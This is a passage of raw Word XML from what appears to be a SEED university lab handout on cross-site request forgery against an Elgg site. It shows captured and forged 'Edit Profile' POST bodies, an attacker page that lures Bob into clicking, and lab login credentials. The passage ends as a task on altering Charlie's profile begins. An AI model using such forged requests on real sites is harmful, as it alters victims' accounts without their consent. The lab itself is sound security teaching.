          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A43E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The objective of your attack is to modify the victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00441D34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00441D34" w:rsidRPr="00441D34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob’s</w:t>
      </w:r>
      <w:r w:rsidR="00441D34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A43E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> profile. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D34" w:rsidRPr="009F626A" w:rsidRDefault="00EA087B" w:rsidP="00441D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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Observe and u</w:t>
      </w:r>
      <w:r w:rsidR="00441D34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">nderstand the </w:t>
      </w:r>
      <w:r w:rsidR="00441D34" w:rsidRPr="004E1B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Edit Profile</w:t>
      </w:r>
      <w:r w:rsidR="00441D34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP request to modify Bob’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D827DD" w:rsidRPr="00D66B24" w:rsidRDefault="00D827DD" w:rsidP="00D827DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Start apache web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00574EE6" w:rsidRDefault="00574EE6" w:rsidP="00D827DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A602FA8" wp14:editId="4CFC6268">
            <wp:extent cx="3937000" cy="26919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43148" cy="27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096B" w:rsidRPr="000D6C16" w:rsidRDefault="00EC1602" w:rsidP="00994BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Observe</w:t>
      </w:r>
      <w:r w:rsidR="00085C9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> the post request header information when </w:t>
      </w:r>
      <w:r w:rsidR="000D6C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Bob </w:t>
      </w:r>
      <w:r w:rsidR="002B386C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002B386C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> his profile</w:t>
      </w:r>
      <w:r w:rsidR="000D6C16" w:rsidRPr="000D6C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000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28"/>
        <w:gridCol w:w="4522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00800405" w:rsidTr="000B2117">
        <w:trPr>
          <w:trHeight w:val="3331"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00800405" w:rsidRDefault="00800405" w:rsidP="000B2117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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4861560" cy="2603500"/>
                  <wp:effectExtent l="152400" t="152400" r="358140" b="36830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1560" cy="26035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74BC" w:rsidTr="000B2117">
        <w:trPr>
          <w:trHeight w:val="3063"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5044" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00800405" w:rsidRDefault="008F0B43" w:rsidP="00D827DD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12CE14F5" wp14:editId="6D33B657">
                  <wp:extent cx="2519947" cy="2025650"/>
                  <wp:effectExtent l="152400" t="152400" r="356870" b="35560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4885" cy="20537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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00800405" w:rsidRDefault="00D374BC" w:rsidP="00D827DD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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23932951" wp14:editId="32D65DD6">
                  <wp:extent cx="2327270" cy="2038350"/>
                  <wp:effectExtent l="152400" t="152400" r="359410" b="36195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37854" cy="20476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161A5" w:rsidTr="000B2117">
        <w:trPr>
          <w:trHeight w:val="3410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="007161A5" w:rsidRDefault="001A71CE" w:rsidP="00D827DD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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12576B38" wp14:editId="734B9F5F">
                  <wp:extent cx="5596653" cy="3124200"/>
                  <wp:effectExtent l="152400" t="152400" r="366395" b="3619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98329" cy="312513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6983" w:rsidTr="000B2117">
        <w:trPr>
          <w:trHeight w:val="1718"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00A16983" w:rsidRDefault="00085C9D" w:rsidP="00D827DD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  <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000B2117" w:rsidRPr="000B2117">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>__elgg_token=be54762d4a99c4d670a2ce6e78fd72f3&amp;__elgg_ts=1477490071&amp;name=Boby&amp;description=%3Cp%3E</w:t>
            </w:r>
            <w:r w:rsidR="000B2117" w:rsidRPr="001B5A5C">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>I+am+Bob</w:t>
            </w:r>
            <w:r w:rsidR="000B2117" w:rsidRPr="00FC544A">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>y.</w:t>
            </w:r>
            <w:r w:rsidR="000B2117" w:rsidRPr="00FC544A">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>%3C</w:t>
            </w:r>
            <w:r w:rsidR="000B2117" w:rsidRPr="000B2117">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>%2Fp%3E&amp;accesslevel%5Bdescription%5D=2&amp;briefdescription=&amp;accesslevel%5Bbriefdescription%5D=2&amp;location=&amp;accesslevel%5Blocation%5D=2&amp;interests=&amp;accesslevel%5Binterests%5D=2&amp;skills=&amp;accesslevel%5Bskills%5D=2&amp;contactemail=&amp;accesslevel%5Bcontactemail%5D=2&amp;phone=&amp;accesslevel%5Bphone%5D=2&amp;mobile=&amp;accesslevel%5Bmobile%5D=2&amp;website=&amp;accesslevel%5Bwebsite%5D=2&amp;twitter=&amp;accesslevel%5Btwitter%5D=2&amp;</w:t>
            </w:r>
            <w:r w:rsidR="000B2117" w:rsidRPr="001B5A5C">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>guid=40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EF096B" w:rsidRDefault="00EF096B" w:rsidP="00AF12E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF096B" w:rsidRDefault="004E1B28" w:rsidP="004E1B28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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Alice crafts HTTP POST</w:t>
      </w:r>
      <w:r w:rsidR="00E34291">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, i.e., a Form, in her malicious web page, named </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00E34291" w:rsidRPr="00993D3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
          </w:rPr>
          <w:t>www.csrflabattaker/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E34291">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16454" w:rsidRPr="00D16454" w:rsidRDefault="00D16454" w:rsidP="00D16454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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7874B43C" wp14:editId="01B9F07B">
            <wp:extent cx="4095750" cy="494466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50268" cy="501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096B" w:rsidRDefault="00EF096B" w:rsidP="00D827DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0012063A" w:rsidRDefault="0032214A" w:rsidP="00677AA1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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A841E5" wp14:editId="6680EF55">
            <wp:extent cx="4956561" cy="44196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59419" cy="4422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063A" w:rsidRDefault="00677AA1" w:rsidP="00677AA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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Alice</w:t>
      </w:r>
      <w:r w:rsidR="002852D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (attacker)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 posts a message to Bob with a URL and lures Bob to click on the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093132D" w:rsidRPr="0092540D" w:rsidRDefault="0093132D" w:rsidP="0093132D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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 xml:space="preserve">Log in as Alice with the username: </w:t>
      </w:r>
      <w:r w:rsidRPr="0093132D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>alice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 and password </w:t>
      </w:r>
      <w:r w:rsidRPr="0093132D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>seedalice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0092540D" w:rsidRDefault="00D87328" w:rsidP="0092540D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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15360DC8" wp14:editId="55BB76BD">
            <wp:extent cx="1119236" cy="1765300"/>
            <wp:effectExtent l="152400" t="152400" r="367030" b="36830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143447" cy="18034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92540D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08996B31" wp14:editId="00B1EA35">
            <wp:extent cx="3530600" cy="1790573"/>
            <wp:effectExtent l="152400" t="152400" r="355600" b="3625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77461" cy="181433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0339B9" w:rsidRPr="0092540D" w:rsidRDefault="000339B9" w:rsidP="000339B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Alice posts a message as follows</w:t>
      </w:r>
      <w:r w:rsidR="00E4404F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send it to Bob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012063A" w:rsidRDefault="0012063A" w:rsidP="0012063A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</w:p>
    <w:p w:rsidR="0012063A" w:rsidRDefault="001C49A7" w:rsidP="0012063A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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="705971F1" wp14:editId="35886B0D">
            <wp:extent cx="5277168" cy="2222500"/>
            <wp:effectExtent l="152400" t="152400" r="361950" b="36830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05607" cy="22344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7946C3" w:rsidRPr="007946C3" w:rsidRDefault="007946C3" w:rsidP="00A4033D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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Bob logs in his account and see the massage</w:t>
      </w:r>
      <w:r w:rsidR="00CF5F58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sent from Alice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012063A" w:rsidRDefault="00CF5FE8" w:rsidP="0012063A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="096F19A7" wp14:editId="013FFEBD">
            <wp:extent cx="5365750" cy="1505963"/>
            <wp:effectExtent l="152400" t="152400" r="368300" b="3613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42545" cy="152751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12063A" w:rsidRDefault="00CF5F58" w:rsidP="00A4033D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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Bob opens the email and click the link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC2DC1" w:rsidRDefault="00CF5F58" w:rsidP="0012063A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77FBF097" wp14:editId="1749C79F">
            <wp:extent cx="5297255" cy="1701800"/>
            <wp:effectExtent l="152400" t="152400" r="360680" b="35560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57565" cy="17211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94B45" w:rsidRPr="00594B45" w:rsidRDefault="00594B45" w:rsidP="00594B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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 w:rsidRPr="00594B45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bob’s been attacked. Bob’s profile has been changed by Alice.</w:t>
      </w:r>
      <w:r w:rsidR="005869A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Below shows Bob’s profile before and after attacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC2DC1" w:rsidRDefault="00552524" w:rsidP="0012063A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9AB32E" wp14:editId="7FD8A960">
            <wp:extent cx="2445286" cy="2197100"/>
            <wp:effectExtent l="152400" t="152400" r="355600" b="35560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59704" cy="22100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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0839D301" wp14:editId="2D607FDE">
            <wp:extent cx="2420439" cy="2216150"/>
            <wp:effectExtent l="152400" t="152400" r="361315" b="35560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37824" cy="22320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BC2DC1" w:rsidRDefault="009A6FED" w:rsidP="009A6FED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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 w:rsidRPr="009A6FED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Understand the HTTP header information when Bob clicks the link that Alice includes in her email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E956C0" w:rsidRDefault="00E956C0" w:rsidP="0012063A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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="306E679C" wp14:editId="16899747">
            <wp:extent cx="5270500" cy="3737776"/>
            <wp:effectExtent l="0" t="0" r="635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80392" cy="3744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C2DC1" w:rsidTr="00BC2DC1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BC2DC1" w:rsidRDefault="00E956C0" w:rsidP="0012063A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E956C0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>name=Boby&amp;description=</w:t>
            </w:r>
            <w:r w:rsidRPr="00C475D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>I+support+SEED+project</w:t>
            </w:r>
            <w:r w:rsidRPr="00E956C0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>%21&amp;accesslevel%5Bdescription%5D=2&amp;briefdescription=I+support+SEED+project%21&amp;accesslevel%5Bbriefdescription%5D=2&amp;location=</w:t>
            </w:r>
            <w:r w:rsidRPr="00C475D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Bowie+State+University</w:t>
            </w:r>
            <w:r w:rsidRPr="00E956C0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;accesslevel%5Blocation%5D=2&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00C475D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>guid=40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002830CC" w:rsidRPr="00D3779B" w:rsidRDefault="002830CC" w:rsidP="002830CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3779B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3779B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Charlie</w:t>
      </w:r>
      <w:r w:rsidR="00AD2EEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3779B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28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FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Profile without His Knowledge</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3779B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3779B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD2EEC" w:rsidRDefault="00AD2EEC" w:rsidP="002830CC">
      <w:p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You are Alice, the attacker, you want to change Charlie’s profile without his knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002830CC" w:rsidRPr="00AD2EEC" w:rsidRDefault="002830CC" w:rsidP="00AD2EEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2EEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2EEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ser name and password of Charlie is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002830CC" w:rsidRPr="00AD2EEC" w:rsidRDefault="002830CC" w:rsidP="00AD2EEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2EEC">
        <w:rPr>
